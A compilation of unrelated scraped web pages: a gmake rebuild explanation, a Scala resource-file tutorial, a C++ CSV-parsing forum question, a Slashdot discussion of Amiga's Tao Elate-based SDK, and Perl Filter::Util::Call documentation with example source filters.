gmake decides what to rebuild by comparing the modification times of targets and their dependent files. As such, to force a file to be recompiled, you may need to manually "touch" one of the relevant files. An example of such a command is:

touch BetaMiniUser/AppUserBuildBase.cc

Last modified: January 2008
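The target/dependency/rule structure described above can be sketched as follows (illustrative names only, not the actual SoftRelTools GNUmakefile):

```makefile
# Illustrative GNUmakefile fragment (hypothetical file names).
# Each instruction is a target, a list of dependencies, and an
# indented rule telling gmake how to rebuild the target.

CXX      = g++
CXXFLAGS = -Wall -I.

# QExample.o depends on its source and header; if either is newer than
# QExample.o (or QExample.o is missing), gmake reruns the rule.
QExample.o : QExample.cc QExample.hh
	$(CXX) $(CXXFLAGS) -c QExample.cc -o QExample.o

# A phony target names an action, not a file to be built.
.PHONY : clean
clean :
	rm -f QExample.o
```

This is why touching QExample.hh forces QExample.o to be recompiled: the header's timestamp becomes newer than the object file's.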
http://www.slac.stanford.edu/BFROOT/www/doc/workbook/compile/compile.html
Scala: Working with resources, folders and files

Let's briefly discuss how to deal with a resources folder and directories in a Scala project. It's a pretty frequent case in programming, when you need to interact with the file system; Scala isn't an exception. So how can it be done in practice? If you want to read about the most powerful way of reading & writing files in Scala, please follow the link.

I'm going to demonstrate a short example on a real Scala project with the following structure:

As you see, it has the resources folder with files and directories inside of it.

Access the resources folder

In order to get the path of a file from the resources folder, I need to use the following code:

object Demo {
  def main(args: Array[String]): Unit = {
    val resourcesPath = getClass.getResource("/json-sample.js")
    println(resourcesPath.getPath)
  }
}

The output of this code is something like this:

/Users/Alex/IdeaProjects/DirectoryFiles/out/production/DirectoryFiles/json-sample.js

Read file line by line

In some sense a pure path to a file is useless. Let's try to read the file from resources line by line. Scala can do it well:

import scala.io.Source

object Demo {
  def main(args: Array[String]): Unit = {
    val fileStream = getClass.getResourceAsStream("/json-sample.js")
    val lines = Source.fromInputStream(fileStream).getLines
    lines.foreach(line => println(line))
  }
}

The output is:

{
  "name": "Alex",
  "age": 26
}

List files in directory

The final important and popular task is to list the files in a directory:

import java.io.File

object Demo {
  def main(args: Array[String]): Unit = {
    val path = getClass.getResource("/folder")
    val folder = new File(path.getPath)
    if (folder.exists && folder.isDirectory)
      folder.listFiles
        .toList
        .foreach(file => println(file.getName))
  }
}

Looks simple and efficient as well. I hope this article was useful for you. Leave your comments and like us on facebook!
http://fruzenshtein.com/scala-working-with-resources-folders-files/
Hi, I have a file called Log.csv which contains 196 columns (9 of them empty) and 1447 rows. I start reading the file, but I think I am facing a problem in getting the whole data; it actually gives me an empty screen when I print it out. I need some help in reading the csv file and putting it in an array, because later on I have to get the date (from the first column) and the min/max for some other columns. I would be really grateful if anyone can help me. I am going to paste 1 line from my Log.csv and then paste my code.

11/10/2004,00:00:45,190,0,13.94,346.81,201.11,18.46,32,3,47,6, ,127,230,228,228,348,128,64,64,8,6,6,50,50,50,34,34,35,6,6,6,0, ,63,230,228,230,344,66,66,66,8,6,7,50,50,50,35,36,35,6,6,6,0, ,49.41,0.00,-0.30,30.91,00,63,6,4,0, ,49.67,0.00,0.06,30.91,00,63,6,4,0, ,49.67,0.00,0.06,30.91,00,63,6,4,0, ,49.67,0.00,-0.30,30.91,00,63,6,4,0, ,49.67,0.00,-0.30,32.87,00,63,6,4,0, ,49.67,0.00,-0.30,32.87,00,63,6,4,0, ,49.94,0.00,-0.30,30.91,00,63,6,4,0, ,49.41,0.00,-0.30,30.91,00,63,6,4,0, ,49.67,0.00,-0.30,30.91,00,63,6,4,0, ,49.41,0.00,-0.30,32.87,00,63,6,4,0, ,49.67,0.00,-0.30,30.91,00,63,6,4,0, ,49.67,0.00,-0.30,32.87,00,63,6,4,0, ,49.41,0.00,0.06,32.87,00,63,6,4,0, ,49.67,0.00,0.06,30.91,00,63,6,4,0, ,

My code is:

#include <iostream>
#include <fstream>
using namespace std;

float matrix_points[1447][196];

int main()
{
    std::ifstream input_file("Log.csv");
    int row(0), col(0);
    char buffer[256];
    char line[255];

    input_file.clear();
    input_file.seekg(0);

    /* brings all the data in .csv file and put them in an array */
    while(!(input_file.eof()))
    {
        for ( col=0; col<196; col++)
        {
            if (matrix_points[row][col] != matrix_points[row][195])
            {
                input_file.getline(line, sizeof(buffer), ',');
                matrix_points[row][col] = atof(line);
            }
            else
            {
                input_file.getline(line, sizeof(buffer), '\n');
                matrix_points[row][12] = atof(line);
            }
        }
        row++;
    }

    /* for loop to print data on screen */
    for (int i=0; i< row ; i++)
        for (int j=0; j< col ; j++)
        {
            if (matrix_points[i][j] != matrix_points[i][195])
                cout << matrix_points[i][j] << " " ;
            else
                cout << matrix_points[i][195] << endl;
        }
    cout << row << endl;
    cout << "\n\n";
    // system("PAUSE");
    return 0;
}
https://www.daniweb.com/programming/software-development/threads/36795/csv-file
Amiga's New SDK: A First Glance 106

Mike Bouma writes: "Recently it began raining news coverage about Amiga's new OS in the mainstream press, like CNN's Digital Jam, The New York Times and Gamersdepot. The first impressions of the new SDK have been very positive. Lars Thomas Denstad has written a small article about his experiences with the new SDK so far."

Re:Amiga? (Score:1)
That's what I find so disturbing... Watch out if you use DC, it splits off the hydrogen and oxygen That's kinda what I'm *trying* to do... why the hell am I replying to this bullshit post anyhow? If you're like me, it's because you've been up for about 30 hours without sleep...

Re:Look at the article, it's Elate. (Score:2)
Amiga Inc really should get their developers' site up () if they hope to attract any developers. There's virtually no technical information up on amiga.com, nothing for developers. They've generated quite a bit of publicity, but I wonder, who is this publicity targeted to? Surely they should be courting developers at this stage.

Re:now is the best time... (Score:4)
The issue I was addressing wasn't so much hardware support as mindshare. Firstly, I agree that this is a Good Thing. Secondly, I am a fan of diversity... one person's "chaos" is usually everybody else's "choice". My lament was that a certain operating system which shall remain nameless (oh hell, windows) managed to gain a massive mindshare in the mid-90's because the alternatives were underdeveloped. I recall with great clarity hearing over and over again in the mid-90's that Amiga was working on Wonderful Things in some secret European laboratory and that one day they would ride over the hill to save us from the... uh, evil wizard. Anyway, poor analogies aside, I must admit I feel a little disappointed. In '96 the options were: Mac (my choice... but near-bankrupt), BeOS (with two device drivers... and run by Gassée! ack!), NeXT (for less money than a BMW...
and less software than Be), Linux (I admit I thought it was a science fair project... or a repackaged Xenix... how was I supposed to know?) or Winders. Really, I was waiting for Moses Amiga... Now that it's here; the "Mac is Back" (nice hardware, my choice of colour), BeOS can be hooked up to a printer finally (and do all sorts of other fine things), NeXT is OS X (and if DP4 is in indicator, it is going to be, at the very least, a lot of fun) and Linux is, uh, well you know Linux. Anyway, the white knight showed up only to find three other tin guys fighting the dragon... and the princess is already dead. That's all I had to say.... Re:It's DEAD. Spell it with me D E A D. (Score:1) AMI, WAKE UP! WAKE UP! Hmm...it certainly looks dead to me. :) BTW: I love my Amigas (500 & 2000)!!! Later... Re:It's DEAD. Spell it with me D E A D. (Score:2) - Spryguy A lot of us have been following it closely.... (Score:2) The Tao strategy seems to be a good one, and it seems to me the only road to take when their (Amiga's) hardware innovations have eight years of catching up to do. That way, if this does take off, we won't be tied to legacy hardware (or any hardware, come to think of it ;-), which is a Good Thing. Although some dissenters won't be happy until computing is 100% true to Jay, Dave, RJ and the others' vision, it can be said that big business and monopoly practice has put paid to that for the forseeable future. If we can make the new Amiga palatable enough that most of the philosophy is intact, then maybe we can finally call it a victory of sorts. Personally, I'll be glad to finally be able to say I code on Amigas without getting funny looks ;-) Re:TAO Similarities (Score:1) Re:The Amiga sucked in it's day. Thank God it's de (Score:1) Hmmm. That's strange. I could have sworn that this 13G hard drive in my Amiga is, well, a hard drive. Guess I must be wrong. "pathetic keyboard" It's got all the keys, they work, what more do you need? 
"No decent applications" Depends what you mean. Other than word processors, spreadsheets, databases, games, networking software, newsreaders, mail readers, web browsers, music sequencers, gfx software... "No multi-user" Nope, you are wrong again. Mine has it right here. Next? "No networking" Interesting. So how do you explain, "Karma collector", the fact that this Amiga upon which I am typing this, is not only connected to the Internet, but, via EtherNet, is connected to 1 PC, 2 Suns and an RS6000 and acts as the gateway.router to enable them all to access the internet? No no networking indeed! Pillock. "I could go on" Yes, I expect you could. And if you went on long enough, you MIGHT actually stumble over a fact, although I doubt you'd recognise one if you did. Idiot. (Score:1) -- Re:Wait one darn minute... (Score:1) But then, I suppose it is too much to expect people to actually CHECK before they post. Re:Sounds like a GPL violation (Score:1) Don't be shy. Please do tell us. BTW, before you answer, you might like to know (as you could have EASILY found out) that AInc have already released the sources to their modifications, as required by teh GPL. So, what violations are you talking about again? Re:It's DEAD. Spell it with me D E A D. (Score:1) -- Re:The Amiga sucked in it's day. Thank God it's de (Score:1) -- Amiga's orphaned OS (Score:1) Re:Amiga (Score:1) -- Re:Amiga? (Score:1) Better yet, go find an old heathkit power supply! TAO Similarities (Score:5) "This month Edge got a glimpse of the future, thanks to a demonstration of the Taos OS. In a nutshell, Taos enables programs coded on any machine to run on any other machine - in parallel, across any available processors in the system." 
"Taos ie even more amazing when you realise that it is the product of one man's efforts, coding for his own benefit, rather than cumulative efforts of some corporate programming team" The men denoted as the "Three Wise Men" were Chris Hinsley (inventor of Taos), Tim Moore and Francis Charig - directors of Taos Systems. This operating system was targeted at the console industry, where Chris had the idea of producing an operating system that would manage games and aid code portability. The first step was a macro set which Chris constructed for the assemblers of all the platformers he was writing on. Rather than write in the native assembler language, he wrote in the macro language he defined; he then devised a translator which would take the binary equivalent of that macro set and translate it, on the fly, into the instructions of a particular machine. The Taos kernel which is typically around 16K, is loaded into the processor at boot time. That kernel is specific to that particular processor. If the kernel finds it needs a translator tool, it brings in the translator as well. The application then gradually builds itself in memory: as a processor in the network needs to call functions it brings them in and binds the application. All programs are compiled or assembled into VP code and are kept in this form on disk. The VP code is translated into the native code of the processor on which it is run only when it is needed. The translation occurs as the VP code is loaded from the disk, across the network, and into the memory of the target processor. (Note this implies distribued computing.) However, this doesnt slow the system down: most processors can actually translate VP code into native code faster than VP code can be loaded from disk and sent across the network. And VP code is often more compact than native code; it takes up less disk space and is loaded faster. 
For instance, if you had a console that booted from CDROM, a CD would be pressed so that the first thing it did would be to load up the appropriate version of Taos, place it in memory and set it running. Then it would load the game code, which would run under the operating system. The operating system would then load the specific tools required for that game, and execution of the game would begin.

Access to custom chips is taken care of automatically by Taos using a method called dynamic binding: individual chips are supported by VP libraries, which allow a tool for that particular processor to be accessed by the system; the tools are bound in during runtime as they are needed. Dynamic binding also enables several processes to share tools, which is very memory efficient.

"This 'virtual processor' works like a 16-bit register RISC microprocessor," explains Chris. "But it isn't an emulated technology; it actually translates into native code, and it's the native code which runs, and all the translations take place during the load time of the"

It is quite an effort to think of their feature list so many years ago: Hardware Independence / Load balancing / Heterogeneous processing / Dynamic Binding / Multi-threading / Parallelism, as well as support for MPEG / Postscript and real-time polygon rendering. In my opinion this guy is a genius; that relegates Linus to quite a mediocre status. I mean this OS is good by today's standards. I mean Linux is even now not brilliant at parallel processing, and this OS can not only parallel process tasks but delegate them to entirely different chips. To put it into perspective, at the start of 1994 only 7 million people in the US had computers with CDROM drives. I think he deserves a universal sympathy award for not patenting some of these concepts. Had these been patented, you wonder whether technologies like Java and companies like Transmeta would still exist. I hope Amiga does well. Naden (member of)

Re:Amiga?
(Score:1)
Norway is a nice country and Finland is a nice country also (and Linus comes from that country). And so is Denmark, and Sweden (Lars Wirzenius) also. Very nice that this sort of virtualisation is made for the Amiga SDK already before they have it running native, sort of like VMware before they got the system of operation running in the natives.

Re:Amiga (Score:1)

Re:Amiga (Score:1)
That could be said of the whole PC world? Does 640k ring a bell anywhere? MS-DOS (dead in Windows Millennium?... could be)? Layers and layers of stuff to cover an aging (and awful) base? I still have my Amiga, and with a 68060 at 50MHz, it sure feels faster than my 500MHz Athlon, by the way. And it has a decent OS (much more efficient than Windoze and more elegant and simple than UN*X)... it just doesn't play Quake (oops, I forgot. It does).

Re:OK let's come to an understanding right now. (Score:1)
Which is plenty of reason to criticise it. Stealth marketing an OS under the Amiga name has obvious attractions from a getting-sheep-to-buy-it perspective, but it's more than a trifle misleading to people who might want something with an API and suchlike that bears a vague resemblance to the classic AmigaOS.

More importantly.. (Score:1)
Am I the only person to see the important issues in life?

Not very impressed, wait for the real thing. (Score:3)

Re:Look at the article, it's Elate. (Score:1)
This should have considerable speed benefits.

Re:What's the point? (Score:2)
Not threatened.

Sick of hearing about resurrection (Score:1)
Oh, and BTW, God is nothing more than a fairy tale told to children to keep them in line. What are you on about?

The Amiga is vapour! (Score:1)
The Amiga died decades ago. Get over it.

Fzz fzzz splut spt spppppppp. (Score:1)
Dead & gone. It sure isn't going to be changing the face of computing any time in the next CENTURY! Get over it, losers.

Re:This reviewer isn't a real geek! (Score:1)

At least the reviews are positive...
(Score:1)

royalty payments (Score:2)

Re:Pretty useless review (Score:1)

Re:The Truth About osm (Score:1)
--

If all Amiga was offering was an OS... (Score:1)
If all Amiga was offering was an OS, then the Amiga would be dead. However, if what they have works as they've described, then it's one more example of what the future holds. A small, efficient means for a single binary to run on a multitude of hardware may only be a laudable goal at present, but with the predicted increases in information-appliances it could become a necessity. Especially since what Amiga (and of course, Tao) seem to be building will run on any hardware and any operating system. The only question that remains is: How Well Does It Work?

URL Broke.. (Score:1)
=)

Re:OK let's come to an understanding right now. (Score:1)

Re:Amiga (Score:1)

Re:OK let's come to an understanding right now. (Score:1)

OK let's come to an understanding right now. (Score:4)

Re:This is great to see (Score:1)
--

Re:now is the best time... (Score:1)
Ya know, the minute I hit submit I realized I'd forgotten the ol' OS/2.... oops. Personally, I chose to avoid it because it was a Big Blue project. The late '70s - early '80s (when my somewhat prejudicial views on operating systems were formed) was a time when BB was regarded by anyone who didn't wear sta-prest as being Evil Incarnate.... of course now I'm a slobbering fan of the PPC chips. My how times have changed :)

Re:At least the reviews are positive... (Score:1)
I like different OSes as much as anybody. I even have an ancient copy of OS/2 on a 386 laptop. I want Amiga to succeed. For some odd reason I lose hope after something has risen from the dead more times than a zombie. Amiga is dead. Let it have its original glory intact. There is no need to beat this dead horse any further.

Re:TAO Similarities (Score:1)
Was it? The website was around 5 years ago, explaining what it did in quite a detailed way, and what platforms it was available for.
Re:OK let's come to an understanding right now. (Score:2)
Sadly, they seem to have taken the "next Amiga" label too far, since the current time at Be looks a lot like Commodore circa the CD-TV - they've got some fantastic stuff, but marketing, user base, and available apps are all going poorly.

If Amiga was smart... (Score:1)

Re:Only RH6.1? (Score:1)

Cluestick (Score:1)

Re:Wait one darn minute... (Score:1)
ps -elf | grep -v grep | my_backend
meaning that you can go build whatever backends you like that work on the .o outputs from gcc and do the final parts themselves without altering gcc. As someone said, they do provide the source, so this is a non-issue, but since gcc is just a launcher for cpp, cc1 and so on, you could easily exchange one part with your own proprietary software without breaking the GPL.

the guy's name is Lars, you say? (Score:1)

Re:Only RH6.1? (Score:1)

Re:OK let's come to an understanding right now. (Score:1)

2D gfx (Score:1)
It's nice to see someone catering to the 2D crowd instead of 3D gfx accelerators and software.

Re:OK let's come to an understanding right now. (Score:1)
It sounds like you got so bored with the Amiga stories that you stopped reading them. This article is a quickie review of some software that has shipped. So your assumption that the Amiga trademark holders just make announcements without ever releasing anything is outdated. It kinda makes you wish you had read the article instead of spouting off and making a prejudiced fool out of yourself in public, huh? Whoops!
---

Re:Amiga (Score:1)
I like my Athlon, and I bought an Athlon because I've never used an Amiga, but I'll be running an Amiga for my web browsing and other things. Amiga's not yet much of a compiling machine. And I like the fact you didn't read the article. True troll style.

Re:At least the reviews are positive... (Score:1)
Regarding the original Amiga and OS/2, you can dwell on the past if you want to. This is not a zombie but something new.
Yet it seems to have the same spirit as the original Amiga. A zombie is a dead body animated by an external force. This is something alive, animated from within. The body dies, but the spirit lives on and takes on new forms. Those who are attached only to the form cannot understand. What's the point? (Score:1) For all this "surprisingly fast" alpha blending, I fail to see how a VM running on top of Linux can provide faster alpha blending than an app built directly on top of Linux (implementing the same algorithms) could. Besides, what with the entire Java mess, do we really need yet another virtual environment? This reviewer isn't a real geek! (Score:3) a) There were girls present. b) People took their shirts off and danced about. I'll be damned if I'm going to consider this guy's opinion in technical matters! cnn transcript (Score:1) -- Re:This reviewer isn't a real geek! (Score:1) Re:URL Broke.. (Score:1) Re:What's the point? (Score:1) A virtual processor is a virtual machine. B) The SDK runs on top of linux, simply to assist porting apps from it and others. The OS runs nativly on 14+ CPUs and even if you code in Assembler its still portable. I wasn't aware of the 14+ CPUs, didn't seem to mention it in the main article - I stand corrected. Still, if you're coding in "assembler" and it runs on 14+ different CPUs, there's a virtual machine/virtual processor/emulator doing a lot of work. C) The Amiga apps are easily faster than ones on linux and they around 50% the size of normal linux apps and they consume far less memory How can something running on a virtual processor on Linux be faster than a native Linux app? Maybe the application and/or the underlying SDK possess some more efficient algorithms, but were those same algorithms implemented on top of the Linux native APIs it would be just as fast if not faster. As for the 'size' of native apps... 
well, that's the machine code, and you'd be referring to the size of the code compiled to Amiga instructions as opposed to (probably) x86 instructions. That's an Intel/IA-32 thing, not a Linux thing, and completely unrelated to the OS. CISC code, which is favourable for emulation/virtual machines, is known to be generally a lot smaller than RISC code (and a lot of optimised Pentium and later code sticks to the basic IA-32 instructions, RISC-style, as the code runs a lot faster).

Re:Amiga? (Score:1)
Anyway, my suggestion would be to add salt (and keep ventilated - chlorine gas will come off the other electrode. Nasty stuff). A model railway or a Scalextric controller is pretty good for getting a decent whack of fairly safe DC power. Worked for me anyway. As long as you only want small quantities. This will fill a test tube quite quickly.

Re:TAO Similarities (Score:1)
I got the information from a nice in-depth article in Acorn User magazine. A hint for anyone wanting to keep things top secret: don't publish the details in newsstand magazines, even Acorn ones. It just doesn't have the desired effect. Tao have always been full of hype, and as far as I can tell have never yet delivered. If they've finally got round to producing something all these years on, then great. But I gave up holding my breath at about the same time as I did for the rebirth of the real Amiga. As for the claims about the performance of their JVM technology elsewhere in this thread, I'm sceptical. Given that Sun's produces close-to-native performance for many tasks (and if you work really hard at cheating, even faster than native under HotSpot), anything that's consistently 22x faster would be a nice toy indeed. In short, don't believe the hype, and in particular don't believe the hype from a company that's been 'just about to release' for half a decade.

Re:pot calling the kettle black (Score:1)

Re:It's DEAD. Spell it with me D E A D. (Score:1)
But please people, lighten up and let us have our fun.
If I want to spend ~$100 on an SDK for a dead platform, it's my money. I don't need/want people to tell me that the platform is dead.

Re:Only RH6.1? (Score:1)

Linux should consider this (Score:1)

Re:A lot of us have been following it closely.... (Score:1)
There's an interesting, parallel syndrome that has started affecting a small subsection of modern geeks: BeOS Persecution Complex. Interestingly enough, the Inquisition doesn't appear to be the Microsoft users, who have traditionally been the most vicious in their ignorance, but some of the more rabid Linux devotees, now using many of the same attacks and barbs that Microsoft fans used to attack Linux: No Apps, No Hardware, Weird APIs, I don't like the Browser.

Re:OK let's come to an understanding right now. (Score:1)
That's pretty cool if you ask me, and it definitely indicates some similarity

Re:Ignorant fool! (Score:1)
>to buy an additional soundcard to get 16 bit...
That may be so, but I can't tell any difference between the Amiga sound and my SB16 - and maybe it's just me, but the Amiga often sounds better (maybe it's just all the superb musicians we had / have?)

Now is the best time (Score:1)
People are once again realizing that there is more than one OS option. Linux and Mac dented the Win32 armor, and now others like BeOS and Amiga can take advantage. It's also apparent that specialized OS's are better than general-purpose OS's at some things. Linux is better as a server than Win32, BeOS is better at multimedia than BSD, etc etc. The time is finally right for the Amiga to be able to get noticed and taken seriously. D

Re:The Amiga sucked in it's day. Thank God it's de (Score:1)
The keyboard again depended on which model you bought. I would personally disagree with the applications; it never had many Microsoft applications, but that was more down to the fact that the two that did turn up on the Amiga (Amiga Basic and Word 1) were slow and buggy.
I'll also admit that the applications aren't up to scratch with current ones, but they weren't bad at the time! Multi-user, I'll admit, the Amiga doesn't really support. It can be added, but it isn't easy to. On the other hand, it was never designed to, and how many people really use multi-user on their home systems? Networking was always an option, in the same way you can add a networking card to a PC. What exactly do you mean no security? Are you just repeating the complaint about multi-user? Because you just complained it had no networking, so it can't be security against remote access... Basically, you're doing the equivalent of buying a cheap 286/386/whatever, then complaining it doesn't match a server class system costing several times as much. It was never designed to, it was meant to be cheap! What it was meant to do, it did very well! Re:pot calling the kettle black (Score:1) Secondly, "Mr. Malda" does not equal "Andover.net," so be careful to whom you're addressing your questions. Re:OK let's come to an understanding right now. (Score:1) I'm wondering whether Amiga really are telling the outside world what they are doing well enough. It seems only the "die hards" and the people who hang round them ever know really what's going on. I seriously doubt that it's down to anything like laziness on the majority of Slashdot readers parts - although you can all prove me wrong if you like! Wait one darn minute... (Score:3) Since the GCC compiler is GPL'ed, doesn't that mean that the whole modified compiler is GPL'ed and consequencly open source? now is the worst time... (Score:3) Sadly, I think this is destined to be an "also ran" in the race sheet of history. Re:OK let's come to an understanding right now. (Score:1) Ok, I really was going to post "the Amiga was good for its day but it should die in peace" but you beat me to the punch. I guess I just don't understand WHY I should care about the Amiga. 
This is an honest question; what advantages do I get over other modern systems?

Pretty useless review (Score:2)

Re:OK let's come to an understanding right now. (Score:2)
The new Amiga OS is built from Tao Elate. It shares 0% legacy with that A500 you may have owned in 1988. It may have a compatibility layer, but so does any Linux box running UAE, and I notice these people don't condemn Linux by the same logic. My point, though, is that the first 30 replies every time the Amiga is mentioned are from people who are actively trying not to learn these things.

Re:Wait one darn minute... (Score:1)
John

A Description of the SDK (Score:1)

Now this is what you people should have read first (Score:1)

Re:Amiga? (Score:1)
Probably because you see inherent benefit to others in helping with experiments that result purely in a greater understanding of the physical sciences, thus encouraging people to study these phenomena full time, and help develop a greater understanding of the universe.

Re:The Amiga sucked in it's day. Thank God it's de (Score:3)
My A500 had a hard drive. In fact I had a SCSI hard drive first (a huge 52Mb!) before most of my PC-owning friends had heard of SCSI.
> no networking
They had TCP/IP stacks. Not included as standard, though. AmiTCP was a popular one which was based on the BSD stack and was stable and fast. These days, most people using Amigas use Miami. It's a modern TCP/IP stack with most features anyone would want, such as IP-NAT and automatic SOCKS (a la tsocks).
> no security
Okay, you got me!
> no decent applications
I think some of the apps were/are good. The only remaining use I have for my amiga (my A4000) is on my LAN as a web client, using my Linux box as a proxy.
I would say that no single browser available for the Amiga beats netscape on linux, but the variety available (three fairly good browsers: Voyager, IBrowse and AWeb) are pretty good, fast (thats not the browsers though - thats the Amiga's snappy GUI) and usually more stable than netscape so I often find myself using my amiga for a fair amount of web access. I find it unfortunate that I find myself feeling like I have to make an excuse for still using my Amiga occasionally. It's a sorry state of affairs when others resort to spreading mis-information about things they don't understand or don't appreciate. Why can't we stick to up-to-date facts and let people make up their own minds instead? Re:Who or what is osm? (Score:1) Trollus Opensourcus Habitat - Slashdot Very rare. poss. extinct. The osm was until recently a common Troll on Slashdot. It had a distinctive Trolling call sounding like long science fiction parody stories about Natalie portman and open source man. Since osm is only capable of considering breeding with hot young actresses, a new generation of these formidable creatures seems quite unlikely. Re:OK let's come to an understanding right now. (Score:3) (Er, not sure what you mean by "modern system" since this is newer than most everything out there.) It looks like its advantages are similar to Java's: there's the write-once-run-anywhere thing, so that it can infiltrate existing platforms. (e.g. You might have an ancient system like Linux or NT, and end up running Amiga apps on it.) It sounds like the owner is smaller and more focused than Sun, so maybe it will adapt faster and become useful sooner than the standard Java class libraries have. It's hard to tell for sure right now, though. The SDKs are still trickling out, and not everyone has theirs yet. After a few thousand programmers have had them for a few months, there should be a lot more information about whether it rules/sucks. So the real answer to your question is that no one knows yet. 
Either wait a few months and find out third hand, or order the SDK and see for yourself. --- Better links (Score:1) 1994 Byte intro to Taos [byte.com] Re:Look at the article, it's Elate. (Score:1) Basically, it's a means of distributing closed-source software. But your one build runs on any platform to which the Amiga layer has been ported, now and in the future, and it still gets decent performance. Re:Ignorant fool! (Score:1) -- "I'm surfin the dead zone Re:OK let's come to an understanding right now. (Score:1) Gateway wasn't doing anything with it anymore, so they sold it. It was rumoured that Microsoft put a lot of pressure on Gateway. Looks interesting! (Score:1) Motorola's first mobile phone based on Tao technology, [tao-group.com] Review [tao-group.com] Tao becomes Sun authorised JVM, [sun.com] Elate first Heterogeneous Multiprocessor OS, [eetimes.com] ARM even states: [armltd.co.uk] "Because of the patented techniques, the intent JTE runs Java applications extremely quickly, more than 30 times faster than competitors' products." Classic/NG Amiga article [stormloader.com] Re:A Description of the SDK (Score:1) Re:Not very impressed, wait for the real thing. (Score:1) You aren't really stuck with rectangles in X, either; E has a bunch of odd shapes you can deal with. In Windows, look at the Sonique MP3 player. Square windows are old news. > The impressive part is that Amiga's OS is platform independent, which means all those little demonstrations can be done on top of Windows, Linux, QNX, BeOS or fully native. And all that with identical code!!!!! Ah, like Java! Or maybe more like the recently announced Inferno. Of course, you could also just distribute portable source. Amiga has nothing new here. Amiga was good because it was the hacker's dream system. Now it's a pathetic little company trying to market a pseudo-OS that has nothing new. Re:The Amiga sucked in its day. Thank God it's de (Score:1) Same Zorro I connector but upside down and on the other side apparently.
And it's not really a bad hard disk interface, it's just that you need a SCSI or IDE controller, which pushes up the cost of the disk drives. Re:OK let's come to an understanding right now. (Score:1) #include <apples-vs-oranges.h> Re:OK let's come to an understanding right now. (Score:2) no more "the amiga is dead and buried" posts and no more "my Amiga 500 multitasks faster than any PC ever will" posts? Re:Wait one darn minute... (Score:3) -- Guges Re:This reviewer isn't a real geek! (Score:2) He'd like to meet up. I'll charge my usual 35%. Mong. * Re:On crack? (Score:1) Mong. * Look at the article, it's Elate. (Score:3) I've seen their environment running on top of QNX, last year. The alpha blending demos were impressive but it was *entirely* at the cost of memory usage. Basically, if you looked at the memory usage, you could compute the amount of double buffering they were using to achieve the effect. (Bear in mind that this is at the cost of hardware acceleration... from what I remember, Tao's Elate is sitting on top of a JavaVM called "intent".) So basically, it's Java without Sun's APIs and without the support of any other large partner. BUT they are looking at HAVi ('Home Audio Video Interoperability') and other emerging standards for what IBM and QNX call "Pervasive Devices". So what I'd like to know is - What's the value-add from Amiga? The name? A higher level API... couldn't just the tao-group do that?
https://slashdot.org/story/00/07/03/0246215/amigas-new-sdk-a-first-glance
Filter::Util::Call - Perl Source Filter Utility Module use Filter::Util::Call ; This module provides you with the framework to write Source Filters in Perl. An alternate interface to Filter::Util::Call is now available. See Filter::Simple for more details. A Perl Source Filter is implemented as a Perl module. The structure of the module can take one of two broadly similar formats. To distinguish between them, the first will be referred to as method filter and the second as closure filter. Here is a skeleton for the method filter: In fact, the skeleton modules shown above are fully functional Source Filters, albeit fairly useless ones. All they do is filter the source stream without modifying it at all. As you can see, both modules have a broadly similar structure. They both make use of the Filter::Util::Call module and both have an import method. The difference between them is that the method filter requires a filter method, whereas the closure filter gets the equivalent of a filter method with the anonymous sub passed to filter_add. To make proper use of the closure filter shown above you need to have a good understanding of the concept of a closure. See perlref for more details on the mechanics of closures. The import function will always have at least one parameter automatically passed by Perl - this corresponds to the name of the package. In the example above it will be "MyFilter". Apart from the first parameter, import can accept an optional list of parameters. These can be used to pass parameters to the filter. For example: use MyFilter qw(a b c) ; will result in the @_ array having the following values: @_[0] => "MyFilter" @_[1] => "a" @_[2] => "b" @_[3] => "c" Before terminating, the import function must explicitly install the filter by calling filter_add. filter_add() The function, filter_add, actually installs the filter. See the filters at the end of this document for examples of using context information with both method filters and closure filters.
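A minimal method filter, following the structure the text describes (an import that calls filter_add and a filter method that wraps filter_read), can be sketched like this; the package name MyFilter matches the example above:

```perl
package MyFilter;

use Filter::Util::Call;

sub import {
    my ($type) = @_;
    # install the filter; filter_add blesses the reference
    # into this package so filter() gets called with it
    filter_add([]);
}

sub filter {
    my ($self) = @_;
    # read the next chunk of source into $_;
    # > 0 means data, 0 means EOF, < 0 means error
    my $status = filter_read();
    $status;
}

1;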
Both the filter method used with a method filter and the anonymous sub used with a closure filter are where the main processing for the filter is done. The big difference between the two types of filter is that the method filter uses the object passed to the method to store any context data, whereas the closure filter uses the lexical variables that are maintained by the closure. Note that the single parameter passed to the method filter, $self, is the same reference that was passed to filter_add blessed into the filter's package. See the example filters later on for details of using $self. Here is a list of the common features of the anonymous sub and the filter() method. Although $_ doesn't actually appear explicitly in the sample filters above, it is implicitly used in a number of places. The function, filter_del, is used to disable the current filter. It does not affect the running of the filter. All it does is tell Perl not to call filter any more. See "Example 4: Using filter_del" for details. Here is a filter which is a variation of the Joe2Jim filter. As well as substituting all occurrences of "Joe" with "Jim" it keeps a count of the number of substitutions made in the context object. Once EOF is detected ($status is zero) the filter will insert an extra line into the source stream. When this extra line is executed it will print a count of the number of substitutions actually made. Note that $status is set to 1 in this case.
package Count;

use Filter::Util::Call;

sub filter {
    my ($self) = @_;
    my ($status);
    if (($status = filter_read()) > 0) {
        s/Joe/Jim/g;
        ++$$self;
    }
    elsif ($$self >= 0) { # EOF
        $_ = "print q[Made ${$self} substitutions\n]";
        $status = 1;
        $$self = -1;
    }
    $status;
}

sub import {
    my ($self) = @_;
    my ($count) = 0;
    filter_add(\$count);
}

1;

Here is a script which uses it:

use Count;
print "Hello Joe\n";
print "Where is Joe\n";

Outputs:

Hello Jim
Where is Jim
Made 2 substitutions

this: use NewSubst qw(start stop from to) ; Here is the module.

package NewSubst;

use Filter::Util::Call;
use Carp;

sub import {
    my ($self, $start, $stop, $from, $to) = @_;
    my ($found) = 0;
    croak("usage: use Subst qw(start stop from to)")
        unless @_ == 5;

    filter_add(
        sub {
            my ($status);
            if (($status = filter_read()) > 0) {
                $found = 1 if $found == 0 and /$start/;
                if ($found) {
                    s/$from/$to/;
                    filter_del() if /$stop/;
                }
            }
            $status;
        }
    )
}

1;
http://search.cpan.org/~pmqs/Filter-1.34/Call/Call.pm
